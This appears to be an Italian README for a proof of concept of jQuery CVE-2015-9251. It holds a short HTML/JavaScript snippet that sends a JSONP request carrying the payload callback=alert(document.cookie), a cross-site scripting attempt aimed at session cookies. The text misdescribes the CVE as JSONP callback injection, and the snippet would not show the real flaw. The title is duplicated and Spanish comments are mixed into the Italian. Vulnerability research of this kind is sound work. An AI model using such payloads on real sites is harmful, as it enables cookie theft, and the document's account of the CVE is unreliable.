
PoC per CVE-2015-9251 jQuery inferiore a 3.0.0.
PoC per CVE-2015-9251 jQuery precedente alla 3.0.0.
Questo repository contiene una Proof of Concept (PoC) per la vulnerabilità CVE-2015-9251 nella libreria jQuery. La vulnerabilità consente un attacco di Cross-Site Scripting (XSS) tramite chiamate JSONP non sanitizzate, poiché jQuery consente l'iniezione di codice nel parametro callback nelle versioni precedenti alla 3.0.0.
CVE-2015-9251 interessa le versioni di jQuery precedenti alla 3.0.0. La vulnerabilità viene sfruttata manipolando il parametro callback in una richiesta JSONP, il che può consentire l'esecuzione di codice JavaScript arbitrario nel browser della vittima. Ciò può portare all'esposizione di dati sensibili, come i cookie di sessione.
Per eseguire il PoC, segui questi passaggi:
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
// Función que simula una solicitud a un servidor vulnerable
$.ajax({
url: "https://example.com/api?callback=alert(document.cookie)",
dataType: "jsonp", // JSONP permite la ejecución de código en JSONP callbacks
success: function(response) {
console.log(response);
}
});
</script>